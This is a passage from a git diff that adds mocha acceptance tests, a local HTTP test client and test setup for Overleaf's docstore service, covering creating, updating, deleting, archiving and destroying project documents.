DocstoreClient.getAllDeletedDocs( + this.project_id, + (error, deletedDocs) => { + if (error) return done(error) + expect(deletedDocs).to.deep.equal([]) + done() + } + ) + }) + }) + + describe('when the doc gets a name on delete', function () { + beforeEach(function (done) { + this.deletedAt = new Date() + DocstoreClient.deleteDocWithDate( + this.project_id, + this.doc_id, + this.deletedAt, + done + ) + }) + + it('should show the doc in deleted docs response', function (done) { + DocstoreClient.getAllDeletedDocs( + this.project_id, + (error, deletedDocs) => { + if (error) return done(error) + expect(deletedDocs).to.deep.equal([ + { + _id: this.doc_id.toString(), + name: 'main.tex', + deletedAt: this.deletedAt.toISOString(), + }, + ]) + done() + } + ) + }) + + describe('after deleting multiple docs', function () { + beforeEach('create doc2', function (done) { + this.doc_id2 = new ObjectId() + DocstoreClient.createDoc( + this.project_id, + this.doc_id2, + this.lines, + this.version, + this.ranges, + done + ) + }) + beforeEach('delete doc2', function (done) { 
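+ // Each deletion records its own name and deletedAt timestamp so the + // /doc-deleted listing below can be asserted to come back newest-first.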
+ this.deletedAt2 = new Date() + DocstoreClient.deleteDocWithDateAndName( + this.project_id, + this.doc_id2, + this.deletedAt2, + 'two.tex', + done + ) + }) + beforeEach('create doc3', function (done) { + this.doc_id3 = new ObjectId() + DocstoreClient.createDoc( + this.project_id, + this.doc_id3, + this.lines, + this.version, + this.ranges, + done + ) + }) + beforeEach('delete doc3', function (done) { + this.deletedAt3 = new Date() + DocstoreClient.deleteDocWithDateAndName( + this.project_id, + this.doc_id3, + this.deletedAt3, + 'three.tex', + done + ) + }) + it('should show all the docs as deleted', function (done) { + DocstoreClient.getAllDeletedDocs( + this.project_id, + (error, deletedDocs) => { + if (error) return done(error) + + expect(deletedDocs).to.deep.equal([ + { + _id: this.doc_id3.toString(), + name: 'three.tex', + deletedAt: this.deletedAt3.toISOString(), + }, + { + _id: this.doc_id2.toString(), + name: 'two.tex', + deletedAt: this.deletedAt2.toISOString(), + }, + { + _id: this.doc_id.toString(), + name: 'main.tex', + deletedAt: this.deletedAt.toISOString(), + }, + ]) + done() + } + ) + }) + + describe('with one more than max_deleted_docs permits', function () { + let maxDeletedDocsBefore + beforeEach(function () { + maxDeletedDocsBefore = Settings.max_deleted_docs + Settings.max_deleted_docs = 2 + }) + afterEach(function () { + Settings.max_deleted_docs = maxDeletedDocsBefore + }) + + it('should omit the first deleted doc', function (done) { + DocstoreClient.getAllDeletedDocs( + this.project_id, + (error, deletedDocs) => { + if (error) return done(error) + + expect(deletedDocs).to.deep.equal([ + { + _id: this.doc_id3.toString(), + name: 'three.tex', + deletedAt: this.deletedAt3.toISOString(), + }, + { + _id: this.doc_id2.toString(), + name: 'two.tex', + deletedAt: this.deletedAt2.toISOString(), + }, + // dropped main.tex + ]) + done() + } + ) + }) + }) + }) + }) +}) + +describe("Destroying a project's documents", function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc_id = new ObjectId() + this.lines = ['original', 'lines'] + this.version = 42 + this.ranges = [] + DocstoreApp.ensureRunning(() => { + DocstoreClient.createDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + error => { + if (error) { + throw error + } + done() + } + ) + }) + }) + + describe('when the doc exists', function () { + beforeEach(function (done) { + DocstoreClient.destroyAllDoc(this.project_id, done) + }) + + it('should remove the doc from the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((err, docs) => { + expect(err).not.to.exist + expect(docs).to.deep.equal([]) + done() + }) + }) + }) + + describe('when the doc is archived', function () { + beforeEach(function (done) { + DocstoreClient.archiveAllDoc(this.project_id, err => { + if (err) { + return done(err) + } + DocstoreClient.destroyAllDoc(this.project_id, done) + }) + }) + + it('should remove the doc from the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((err, docs) => { + expect(err).not.to.exist + expect(docs).to.deep.equal([]) + done() + }) + }) + + it('should remove the doc contents from s3', function (done) { + DocstoreClient.getS3Doc(this.project_id, this.doc_id, error => { + expect(error).to.be.instanceOf(Errors.NotFoundError) + done() + }) + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/GettingAllDocsTests.js b/services/docstore/test/acceptance/js/GettingAllDocsTests.js new file mode 
100644 index 0000000..8fe5e7d --- /dev/null +++ b/services/docstore/test/acceptance/js/GettingAllDocsTests.js @@ -0,0 +1,112 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { ObjectId } = require('mongodb-legacy') +const async = require('async') +const DocstoreApp = require('./helpers/DocstoreApp') + +const DocstoreClient = require('./helpers/DocstoreClient') + +describe('Getting all docs', function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.docs = [ + { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + ranges: { mock: 'one' }, + rev: 2, + }, + { + _id: new ObjectId(), + lines: ['aaa', 'bbb', 'ccc'], + ranges: { mock: 'two' }, + rev: 4, + }, + { + _id: new ObjectId(), + lines: ['111', '222', '333'], + ranges: { mock: 'three' }, + rev: 6, + }, + ] + this.deleted_doc = { + _id: new ObjectId(), + lines: ['deleted'], + ranges: { mock: 'four' }, + rev: 8, + } + const version = 42 + const jobs = Array.from(this.docs).map(doc => + (doc => { + return callback => { + return DocstoreClient.createDoc( + this.project_id, + doc._id, + doc.lines, + version, + doc.ranges, + callback + ) + } + })(doc) + ) + jobs.push(cb => { + return DocstoreClient.createDoc( + this.project_id, + this.deleted_doc._id, + this.deleted_doc.lines, + version, + this.deleted_doc.ranges, + err => { + if (err) return done(err) + return DocstoreClient.deleteDoc( + this.project_id, + this.deleted_doc._id, + cb + ) + } + ) + }) + jobs.unshift(cb => DocstoreApp.ensureRunning(cb)) + return async.series(jobs, done) + }) + + it('getAllDocs should return all the (non-deleted) docs', function (done) { + return DocstoreClient.getAllDocs(this.project_id, (error, res, docs) => { + if (error != null) { + throw error + } + docs.length.should.equal(this.docs.length) + for (let i = 0; i < docs.length; i++) { + const doc = docs[i] + doc.lines.should.deep.equal(this.docs[i].lines) + } + return done() + }) + }) + + return it('getAllRanges should return all the (non-deleted) doc ranges', function (done) { + return DocstoreClient.getAllRanges(this.project_id, (error, res, docs) => { + if (error != null) { + throw error + } + docs.length.should.equal(this.docs.length) + for (let i = 0; i < docs.length; i++) { + const doc = docs[i] + doc.ranges.should.deep.equal(this.docs[i].ranges) + } + return done() + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/GettingDocsFromArchiveTest.js b/services/docstore/test/acceptance/js/GettingDocsFromArchiveTest.js new file mode 100644 index 0000000..8448f26 --- /dev/null +++ b/services/docstore/test/acceptance/js/GettingDocsFromArchiveTest.js @@ -0,0 +1,139 @@ +const Settings = require('@overleaf/settings') +const { ObjectId } = require('../../../app/js/mongodb') +const DocstoreApp = require('./helpers/DocstoreApp') +const DocstoreClient = require('./helpers/DocstoreClient') +const { Storage } = require('@google-cloud/storage') + +describe('Getting A Doc from Archive', function () { + before(function (done) { + return DocstoreApp.ensureRunning(done) + }) + + before(async function () { + const storage = new 
Storage(Settings.docstore.gcs.endpoint) + await storage.createBucket(Settings.docstore.bucket) + await storage.createBucket(`${Settings.docstore.bucket}-deleted`) + }) + + after(async function () { + // Tear down the buckets created above + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.bucket(Settings.docstore.bucket).deleteFiles() + await storage.bucket(Settings.docstore.bucket).delete() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).deleteFiles() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).delete() + }) + + describe('for an archived doc', function () { + before(function (done) { + this.project_id = new ObjectId() + this.timeout(1000 * 30) + this.doc = { + _id: new ObjectId(), + lines: ['foo', 'bar'], + ranges: {}, + version: 2, + } + DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error) { + return done(error) + } + DocstoreClient.archiveDoc( + this.project_id, + this.doc._id, + (error, res) => { + this.res = res + if (error) { + return done(error) + } + done() + } + ) + } + ) + }) + + it('should successfully archive the doc', function (done) { + this.res.statusCode.should.equal(204) + done() + }) + + it('should return the doc lines and version from persistent storage', function (done) { + return DocstoreClient.peekDoc( + this.project_id, + this.doc._id, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(200) + res.headers['x-doc-status'].should.equal('archived') + doc.lines.should.deep.equal(this.doc.lines) + doc.version.should.equal(this.doc.version) + doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + it('should return the doc lines and version from persistent storage on subsequent requests', function (done) { + return DocstoreClient.peekDoc( + this.project_id, + this.doc._id, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(200) + res.headers['x-doc-status'].should.equal('archived') + doc.lines.should.deep.equal(this.doc.lines) + doc.version.should.equal(this.doc.version) + doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + describe('for a non-archived doc', function () { + before(function (done) { + this.project_id = new ObjectId() + this.timeout(1000 * 30) + this.doc = { + _id: new ObjectId(), + lines: ['foo', 'bar'], + ranges: {}, + version: 2, + } + DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + done + ) + }) + + it('should return the doc lines and version from mongo', function (done) { + return DocstoreClient.peekDoc( + this.project_id, + this.doc._id, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(200) + res.headers['x-doc-status'].should.equal('active') + doc.lines.should.deep.equal(this.doc.lines) + doc.version.should.equal(this.doc.version) + doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/GettingDocsTests.js b/services/docstore/test/acceptance/js/GettingDocsTests.js new file mode 100644 index 0000000..121b3c1 --- /dev/null +++ b/services/docstore/test/acceptance/js/GettingDocsTests.js @@ -0,0 +1,137 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { ObjectId } = require('mongodb-legacy') +const DocstoreApp = require('./helpers/DocstoreApp') + +const DocstoreClient = require('./helpers/DocstoreClient') + +describe('Getting a doc', function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc_id = new ObjectId() + this.lines = ['original', 'lines'] + this.version = 42 + this.ranges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'foo', p: 3 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + return DocstoreApp.ensureRunning(() => { + return DocstoreClient.createDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + error => { + if (error != null) { + throw error + } + return done() + } + ) + }) + }) + + describe('when the doc exists', function () { + return it('should get the doc lines and version', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.lines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.ranges) + return done() + } + ) + }) + }) + + describe('when the doc does not exist', function () { + return it('should return a 404', function (done) { + const missingDocId = new ObjectId() + return DocstoreClient.getDoc( + this.project_id, + missingDocId, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(404) + return done() + } + ) + }) + }) + + return describe('when the doc is a deleted doc', function () { + beforeEach(function (done) { + this.deleted_doc_id = new ObjectId() + return DocstoreClient.createDoc( + this.project_id, + this.deleted_doc_id, + this.lines, + this.version, + this.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.deleteDoc( + this.project_id, + this.deleted_doc_id, + done + ) + } + ) + }) + + it('should return the doc', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.deleted_doc_id, + { include_deleted: true }, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.lines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.ranges) + doc.deleted.should.equal(true) + return done() + } + ) + }) + + return it('should return a 404 when the query string is not set', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.deleted_doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(404) + return done() + } + ) + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/UpdatingDocsTests.js b/services/docstore/test/acceptance/js/UpdatingDocsTests.js new file mode 100644 index 0000000..8793341 --- /dev/null +++ b/services/docstore/test/acceptance/js/UpdatingDocsTests.js @@ -0,0 +1,557 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { ObjectId } = require('mongodb-legacy') +const DocstoreApp = require('./helpers/DocstoreApp') + +const DocstoreClient = require('./helpers/DocstoreClient') + +describe('Applying updates to a doc', function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc_id = new ObjectId() + this.originalLines = ['original', 'lines'] + this.newLines = ['new', 'lines'] + this.originalRanges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'foo', p: 3 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + this.newRanges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'bar', p: 6 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + this.version = 42 + return DocstoreApp.ensureRunning(() => { + return DocstoreClient.createDoc( + this.project_id, + this.doc_id, + this.originalLines, + this.version, + this.originalRanges, + error => { + if (error != null) { + throw error + } + return done() + } + ) + }) + }) + + describe('when nothing has been updated', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.originalLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = false', function () { + return this.body.modified.should.equal(false) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.originalRanges) + return done() + } + ) + }) + }) + + describe('when the lines have changed', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.newLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + it('should return the rev', function () { + return this.body.rev.should.equal(2) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.newLines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.originalRanges) + return done() + } + ) + }) + }) + + describe('when the version has changed', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.originalLines, + this.version + 1, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + it('should return the rev', function () { + return 
this.body.rev.should.equal(1) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version + 1) + doc.ranges.should.deep.equal(this.originalRanges) + return done() + } + ) + }) + }) + + describe('when the version was decremented', function () { + beforeEach(function (done) { + DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.newLines, + this.version - 1, + this.newRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + done() + } + ) + }) + + it('should return 409', function () { + this.res.statusCode.should.equal(409) + }) + + it('should not update the doc in the API', function (done) { + DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.originalRanges) + done() + } + ) + }) + }) + + describe('when the ranges have changed', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.originalLines, + this.version, + this.newRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + it('should return the rev', function () { + return this.body.rev.should.equal(2) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.newRanges) + return done() + } + ) + }) + }) + + describe('when the doc does not exist', function () { + beforeEach(function (done) { + this.missing_doc_id = new ObjectId() + return DocstoreClient.updateDoc( + this.project_id, + this.missing_doc_id, + this.originalLines, + 0, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should create the doc', function () { + return this.body.rev.should.equal(1) + }) + + return it('should be retrievable', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.missing_doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(0) + doc.ranges.should.deep.equal(this.originalRanges) + return done() + } + ) + }) + }) + + describe('when malformed doc lines are provided', function () { + describe('when the lines are not an array', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + { foo: 'bar' }, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return 400', function () { + return this.res.statusCode.should.equal(400) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, 
res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + return done() + } + ) + }) + }) + + return describe('when the lines are not present', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + null, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return 400', function () { + return this.res.statusCode.should.equal(400) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + return done() + } + ) + }) + }) + }) + + describe('when no version is provided', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.originalLines, + null, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return 400', function () { + return this.res.statusCode.should.equal(400) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version) + return done() + } + ) + }) + }) + + describe('when the content is large', function () { + beforeEach(function (done) { + const line = new Array(1025).join('x') // 1kb + this.largeLines = Array.apply(null, Array(1024)).map(() => line) // 1mb + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.largeLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.largeLines) + return done() + } + ) + }) + }) + + describe('when there is a large json payload', function () { + beforeEach(function (done) { + const line = new Array(1025).join('x') // 1kb + this.largeLines = Array.apply(null, Array(1024)).map(() => line) // 1mb + this.originalRanges.padding = Array.apply(null, Array(2049)).map( + () => line + ) // 2mb + 1kb + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.largeLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.largeLines) + return done() + } + ) + }) + }) + + describe('when the document body is too large', function () { + beforeEach(function (done) { + const line = new Array(1025).join('x') // 1kb + this.largeLines = 
Array.apply(null, Array(2049)).map(() => line) // 2mb + 1kb + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.largeLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return 413', function () { + return this.res.statusCode.should.equal(413) + }) + + it('should report body too large', function () { + return this.res.body.should.equal('document body too large') + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + return done() + } + ) + }) + }) + + return describe('when the json payload is too large', function () { + beforeEach(function (done) { + const line = new Array(1025).join('x') // 1kb + this.largeLines = Array.apply(null, Array(1024)).map(() => line) // 1mb + this.originalRanges.padding = Array.apply(null, Array(6144)).map( + () => line + ) // 6mb + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.largeLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + return done() + } + ) + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/helpers/DocstoreApp.js b/services/docstore/test/acceptance/js/helpers/DocstoreApp.js new file mode 100644 index 0000000..5e837b1 --- /dev/null +++ b/services/docstore/test/acceptance/js/helpers/DocstoreApp.js @@ -0,0 +1,26 @@ +const app = require('../../../../app') +const settings = require('@overleaf/settings') + +module.exports = { + running: false, + initing: false, + callbacks: [], + ensureRunning(callback) { + if (this.running) { + return callback() + } else if (this.initing) { + return this.callbacks.push(callback) + } + this.initing = true + this.callbacks.push(callback) + app.listen(settings.internal.docstore.port, '127.0.0.1', error => { + if (error != null) { + throw error + } + this.running = true + for (callback of Array.from(this.callbacks)) { + callback() + } + }) + }, +} diff --git a/services/docstore/test/acceptance/js/helpers/DocstoreClient.js b/services/docstore/test/acceptance/js/helpers/DocstoreClient.js new file mode 100644 index 0000000..790ec8f --- /dev/null +++ b/services/docstore/test/acceptance/js/helpers/DocstoreClient.js @@ -0,0 +1,195 @@ +let DocstoreClient +const request = require('request').defaults({ jar: false }) +const settings = require('@overleaf/settings') +const Persistor = require('../../../../app/js/PersistorManager') + +async function streamToString(stream) { + const chunks = [] + return await new Promise((resolve, reject) => { + stream.on('data', chunk => chunks.push(chunk)) + stream.on('error', reject) + stream.on('end', () => resolve(Buffer.concat(chunks).toString('utf8'))) + }) +} + +async function getStringFromPersistor(persistor, bucket, key) { + const stream = await persistor.getObjectStream(bucket, key, {}) + stream.resume() + return await streamToString(stream) +} + +module.exports = DocstoreClient = { + createDoc(projectId, docId, lines, version, ranges, 
callback) {
+    return DocstoreClient.updateDoc(
+      projectId,
+      docId,
+      lines,
+      version,
+      ranges,
+      callback
+    )
+  },
+
+  getDoc(projectId, docId, qs, callback) {
+    request.get(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}`,
+        json: true,
+        qs,
+      },
+      callback
+    )
+  },
+
+  peekDoc(projectId, docId, qs, callback) {
+    request.get(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}/peek`,
+        json: true,
+        qs,
+      },
+      callback
+    )
+  },
+
+  isDocDeleted(projectId, docId, callback) {
+    request.get(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}/deleted`,
+        json: true,
+      },
+      callback
+    )
+  },
+
+  getAllDocs(projectId, callback) {
+    request.get(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc`,
+        json: true,
+      },
+      (error, res, body) => {
+        callback(error, res, body)
+      }
+    )
+  },
+
+  getAllDeletedDocs(projectId, callback) {
+    request.get(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc-deleted`,
+        json: true,
+      },
+      (error, res, body) => {
+        if (error) return callback(error)
+        if (res.statusCode !== 200) {
+          return callback(new Error('unexpected statusCode'))
+        }
+        callback(null, body)
+      }
+    )
+  },
+
+  getAllRanges(projectId, callback) {
+    request.get(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/ranges`,
+        json: true,
+      },
+      callback
+    )
+  },
+
+  updateDoc(projectId, docId, lines, version, ranges, callback) {
+    return request.post(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}`,
+        json: {
+          lines,
+          version,
+          ranges,
+        },
+      },
+      callback
+    )
+  },
+
+  deleteDoc(projectId, docId, callback) {
+    DocstoreClient.deleteDocWithDateAndName(
+      projectId,
+      docId,
+      new Date(),
+      'main.tex',
+      callback
+    )
+  },
+
+  deleteDocWithDate(projectId, docId, date, callback) {
+    DocstoreClient.deleteDocWithDateAndName(
+      projectId,
+      docId,
+      date,
+      'main.tex',
+      callback
+    )
+  },
+
+  deleteDocWithName(projectId, docId, name, callback) {
+    DocstoreClient.deleteDocWithDateAndName(
+      projectId,
+      docId,
+      new Date(),
+      name,
+      callback
+    )
+  },
+
+  deleteDocWithDateAndName(projectId, docId, deletedAt, name, callback) {
+    request.patch(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}`,
+        json: { name, deleted: true, deletedAt },
+      },
+      callback
+    )
+  },
+
+  archiveAllDoc(projectId, callback) {
+    request.post(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/archive`,
+      },
+      callback
+    )
+  },
+
+  archiveDoc(projectId, docId, callback) {
+    request.post(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/doc/${docId}/archive`,
+      },
+      callback
+    )
+  },
+
+  destroyAllDoc(projectId, callback) {
+    request.post(
+      {
+        url: `http://127.0.0.1:${settings.internal.docstore.port}/project/${projectId}/destroy`,
+      },
+      callback
+    )
+  },
+
+  getS3Doc(projectId, docId, callback) {
+    getStringFromPersistor(
+      Persistor,
+      settings.docstore.bucket,
+      `${projectId}/${docId}`
+    )
+      .then(data => {
+        callback(null, JSON.parse(data))
+      })
+      .catch(callback)
+  },
+}
diff --git a/services/docstore/test/setup.js b/services/docstore/test/setup.js
new file mode 100644
index 0000000..92b86c9
--- /dev/null
+++ b/services/docstore/test/setup.js
@@ -0,0 +1,55 @@
+const chai = require('chai')
+const sinon = 
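+// Editor's note: DocstoreClient.getS3Doc above fetches an archived doc back
+// out of the object store so acceptance tests can assert on what was written;
+// a sketched call site (hypothetical ids and fixture names):
+//   DocstoreClient.getS3Doc(projectId, docId, (error, s3Doc) => {
+//     if (error) return done(error)
+//     s3Doc.lines.should.deep.equal(expectedLines)
+//     done()
+//   })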
require('sinon') +const sinonChai = require('sinon-chai') +const chaiAsPromised = require('chai-as-promised') +const SandboxedModule = require('sandboxed-module') +const timersPromises = require('node:timers/promises') + +// ensure every ObjectId has the id string as a property for correct comparisons +require('mongodb-legacy').ObjectId.cacheHexString = true + +process.env.BACKEND = 'gcs' + +// Chai configuration +chai.should() +chai.use(sinonChai) +chai.use(chaiAsPromised) + +// Global stubs +const sandbox = sinon.createSandbox() +const stubs = { + logger: { + debug: sandbox.stub(), + log: sandbox.stub(), + info: sandbox.stub(), + warn: sandbox.stub(), + err: sandbox.stub(), + error: sandbox.stub(), + fatal: sandbox.stub(), + }, +} + +// SandboxedModule configuration +SandboxedModule.configure({ + requires: { + '@overleaf/logger': stubs.logger, + 'timers/promises': timersPromises, + 'mongodb-legacy': require('mongodb-legacy'), + }, + globals: { Buffer, JSON, Math, console, process }, + sourceTransformers: { + removeNodePrefix: function (source) { + return source.replace(/require\(['"]node:/g, "require('") + }, + }, +}) + +exports.mochaHooks = { + beforeEach() { + this.logger = stubs.logger + }, + + afterEach() { + sandbox.reset() + }, +} diff --git a/services/docstore/test/unit/js/DocArchiveManagerTests.js b/services/docstore/test/unit/js/DocArchiveManagerTests.js new file mode 100644 index 0000000..a57f980 --- /dev/null +++ b/services/docstore/test/unit/js/DocArchiveManagerTests.js @@ -0,0 +1,580 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = '../../../app/js/DocArchiveManager.js' +const SandboxedModule = require('sandboxed-module') +const { ObjectId } = require('mongodb-legacy') +const Errors = require('../../../app/js/Errors') +const StreamToBuffer = require('../../../app/js/StreamToBuffer').promises + +describe('DocArchiveManager', function () { + let DocArchiveManager, + 